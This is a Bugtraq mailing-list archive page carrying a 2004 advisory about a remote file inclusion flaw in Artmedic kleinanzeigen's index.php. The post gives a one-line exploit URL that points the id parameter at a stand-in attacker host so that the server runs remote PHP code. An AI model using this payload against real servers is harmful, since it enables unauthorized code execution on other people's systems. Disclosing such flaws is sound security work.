Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Artmedic kleinanzeigen include vulnerability
From: Francisco Alisson <dominusvis () click21 com br>
Date: 19 Jul 2004 02:25:16 -0000


Artmedic kleinanzeigen allow code inclusion in index.php. 
 
Exploit: 
www.host.com/artmedic-kleinanzeigen-path/index.php?id=http://evil-host.com 
 
An evil attacker could be use this vulnerability to execute 
php code with the same user id of the running server. 
 
Thanks and sorry for the bad english 
Dominus_Vis from Infektion Group :> 
irc.phey.net -j #infektion

  By Date           By Thread  

Current thread:
  • Artmedic kleinanzeigen include vulnerability Francisco Alisson (Jul 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]